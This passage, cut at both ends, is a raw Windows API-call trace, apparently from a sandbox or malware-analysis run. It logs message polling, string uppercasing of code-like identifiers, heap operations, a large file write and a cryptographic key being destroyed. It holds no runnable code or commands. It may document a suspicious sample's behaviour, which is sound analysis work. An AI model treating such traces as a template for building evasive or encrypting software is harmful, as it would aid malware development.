wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.500] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.500] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.500] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.501] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.501] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.501] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.509] WriteFile (in: hFile=0x4f4, lpBuffer=0x2ac2f18*, nNumberOfBytesToWrite=0x13b00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac2f18*, lpNumberOfBytesWritten=0x8cf5e4*=0x13b00, lpOverlapped=0x0) returned 1 [0122.512] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.512] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.512] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0122.512] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.512] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0122.512] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.513] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.513] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.513] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.513] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.513] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.513] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa480, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.513] CryptDestroyKey (hKey=0x9a42c0) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0122.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0122.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0122.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2aae878 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0122.514] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.515] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.515] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0122.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f40 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.515] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0122.516] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0122.516] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0122.516] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.516] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0122.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa228 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0122.516] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.517] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0122.517] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0122.517] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa120 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa150 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa168 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fa0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1c8 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1e0 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0122.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa420 [0122.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa378 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa510 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa270 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4b0 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.519] HeapFree (in: hHeap=0x2af0000, 